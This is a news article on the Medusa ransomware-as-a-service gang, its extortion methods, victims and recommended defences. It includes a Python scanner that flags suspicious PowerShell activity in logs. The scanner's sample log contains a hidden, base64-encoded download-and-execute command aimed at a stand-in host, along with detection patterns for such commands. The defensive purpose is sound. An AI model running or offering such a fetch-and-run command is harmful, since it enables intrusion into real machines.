
Medusa, a criminal gang offering a sophisticated ransomware-as-a-service (RaaS) variant, has caused US authorities to issue an urgent cybersecurity advisory warning, as the malware is increasingly used to target critical national infrastructure.
RaaS, where attackers lease their capabilities to private bidders, is not a new phenomenon but the variant from Medusa is notable for its sophistication, scale and “double extortion” methods, according to the joint advisory from the US Cybersecurity and Infrastructure Security Agency and the FBI.
What we know about the Medusa ransomware-as-a-service variant
The Medusa variant was first used in 2021, but more recently has been linked to over 300 cyberattacks on critical infrastructure, including attacks on organisations in the medical, education, legal, technical and manufacturing sectors.
Attackers aren’t just encrypting the files of their targets, they are stealing their data and then threatening to release it publicly on Medusa’s leak site if the victims don’t pay the ransom. The site even sports a menacing countdown ticker.
The data in question is often very sensitive. The Minneapolis School District fell victim to a ransomware attack in February this year resulting in highly sensitive student and teacher information being published on the internet, including abuse allegations.
In January, Gateshead council suffered an attack by Medusa and in February, attackers claimed to have stolen 2.275 terabytes of data from HCRG Care Group, formerly Virgin Care. Medusa threatened to sell the stolen information for $2m (£1.54m) or delete the data for the same fee.
“Medusa has extremely aggressive extortion tactics,” says Boris Cipot, a senior security engineer at Black Duck, a cybersecurity firm. “Ransoms are tailored to the victim’s profile and Medusa uses its blog to publicly auction stolen data, to shame and increase pressure on its victims.”
These tactics, combined with the tool’s ability to cripple infrastructure, have made Medusa a potent threat, particularly for high-impact, public sector targets. According to Cipot, Medusa’s tactics will be a major test of the resilience of critical organisations.
Stolen data is often leaked to multiple locations, so cybersecurity professionals cannot simply monitor Medusa’s data-leak website on the dark web. Data may be available for download on Telegram or even on established social media platforms such as X.
Danny Howett is technical director at CyXcel, an attack-response firm, which monitors more than 10,000 channels on Telegram. “Just as cyber gangs are sharing zip or archive files on the dark web, those files are also being pushed to Telegram for anyone to download,” Howett says, complicating incident response for affected organisations.
He adds that the distributed nature of RaaS, where anyone can use the tools, makes it difficult for authorities to pinpoint the criminals at the organisation’s core or to slow the tide of attacks. But Medusa’s appearance on Russian-language cybercrime forums has raised suspicions that at least some affiliates are located in Russia.
“When there are affiliates, it’s much more difficult to say the attackers are from one group or region,” he adds, pointing to the cybercriminal group LockBit, which had affiliates arrested in Ukraine, Poland, the Netherlands and the UK.
How Medusa RaaS works
A recent report from BlackFog, a cybersecurity company, found that Medusa is now the third-largest ransomware variant – and it’s still growing. According to Darren Williams, CEO at BlackFog, part of the group’s success may be fuelled by AI systems, which are helping attackers train their engines to be “more targeted and more effective”.
“They use AI to perform phishing operations and hack into workstations and they’re getting a lot of success out of it,” says Williams.
Once the attackers have gained access to an organisation, they use so-called ‘living off the land’ (LotL) techniques to further exploit systems and spread malware.
LotL attacks abuse components already present in victims’ IT infrastructure, such as Microsoft PowerShell, the Windows scripting and configuration tool, to spread the malware to other devices. “This is very hard to detect, because you’re effectively using the tools that are already on the machines,” adds Williams.
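One defender-side check for the point Williams makes, written as an added example rather than anything from the article or the CISA/FBI advisory: because PowerShell is already on every Windows machine, detection has to come from what it is asked to run, which script-block logging (Windows Event ID 4104) records. The scanner below reads constructed log entries and flags encoded commands, download cradles, hidden windows and remoting to other hosts; the line format, host and user names, rule set and sample entries are all assumptions.

```python
import base64
import re

# Indicators for PowerShell script-block logs (Event ID 4104). Cradles and hidden windows are
# rarely needed by admin scripts; remoting is legitimate tooling, so it gets lower severity.
RULES = [
    ("high", "download cradle", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\bIEX\b|Invoke-Expression", re.I)),
    ("high", "hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("medium", "remote execution to other hosts", re.compile(r"Invoke-Command\s.*-ComputerName|Enter-PSSession", re.I)),
]
# -EncodedCommand (also -enc / -e) carries base64 of UTF-16LE script text.
ENCODED = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(blob: str) -> str:
    """Return the script hidden behind -EncodedCommand, or '' if it does not decode."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""

def scan_line(line: str):
    """Parse an assumed '<time> <host> <user> <script>' entry; return a finding dict or None."""
    parts = line.split(maxsplit=3)
    if len(parts) < 4: return None
    _, host, user, script = parts
    reasons, sevs, decoded = [], [], ""
    enc = ENCODED.search(script)
    if enc:
        decoded = decode_encoded_command(enc.group(1))
        reasons.append("encoded command"); sevs.append("medium")
    for sev, label, pat in RULES:  # each rule runs on the raw text and on the decoded text
        if pat.search(script) or (decoded and pat.search(decoded)):
            reasons.append(label); sevs.append(sev)
    if not reasons: return None
    return {"host": host, "user": user, "reasons": reasons, "decoded": decoded,
            "severity": "high" if "high" in sevs else "medium"}

def scan_log(text: str):
    return [f for f in map(scan_line, text.splitlines()) if f]

# Constructed sample log, not real telemetry; the encoded entry is built at runtime so the base64 is exact.
_CRADLE = "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/x')"
_ENC = base64.b64encode(_CRADLE.encode("utf-16le")).decode()  # the form PowerShell expects after -enc
SAMPLE_LOG = (
    "2025-03-12T09:14:02Z WS-041 jdoe Get-ChildItem C:\\Reports | Measure-Object\n"
    f"2025-03-12T09:15:37Z WS-041 jdoe powershell -nop -w hidden -enc {_ENC}\n"
    "2025-03-12T09:16:10Z WS-041 jdoe Invoke-Command -ComputerName FS-02,FS-03 -ScriptBlock { Get-Service }\n"
    "2025-03-12T09:20:44Z SRV-07 svc_backup Get-Service | Where-Object Status -eq Running\n"
)
```

Full script-block logging is a policy setting rather than a default, so the entries have to exist before any rule can fire; the remoting rule will also match routine administration and needs a baseline of expected source hosts and accounts before it is useful as an alert.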
Medusa ransomware: the main takeaways for cyber leaders
The Medusa developers appear to rely on an ecosystem of initial-access brokers (IABs) to gain entry to compromised networks, says Casey Ellis, founder of Bugcrowd, a cybersecurity firm. In contrast to another recent entrant to the ransomware market, FunkSec, Medusa seems to be going after high-ticket payments in the range of $100,000 (£77,000) to $1m (£770,000).
Ellis says its reliance on access brokers highlights the importance of “vigilance around public-facing initial-access vectors” – unpatched systems, poor web coding, configuration mistakes and shadow IT – as well as strong cyber hygiene for access credentials and tokens. Attackers have also been known to compromise systems well in advance of an attack to scope out weaknesses or potentially lucrative data.
“The bad guys are often already on the device,” says Williams. “You can do a lot of damage by getting behind protection and running reconnaissance – it’s the keys to the kingdom. So people might think they’ll stop them. But the attackers might already be there.”
To protect against variants such as Medusa, the standard anti-ransomware defences apply, says Cipot. That means isolating critical systems with network segmentation, to prevent lateral movement across networks. Backups kept in immutable storage, which cannot be edited or altered, withstand attempts to encrypt them and allow recovery. And he advises organisations to deploy endpoint and network monitoring and detection to spot unusual activity – particularly around remote desktop access tools, such as AnyDesk.
“Think of cybersecurity as a living organism where threats adapt and usually overcome the given security obstacles if those obstacles do not also evolve,” Cipot says. “User education and fire drills are necessary too. Make sure your users understand why they must adhere to more strict rules, test your mitigation and worst-case scenario plans, and adopt them where needed.”
Just as Perseus used a reflective shield to defeat the snake-haired gorgon of Greek mythology, organisations seeking to defend themselves against this more recent Medusa might do well to look in the mirror.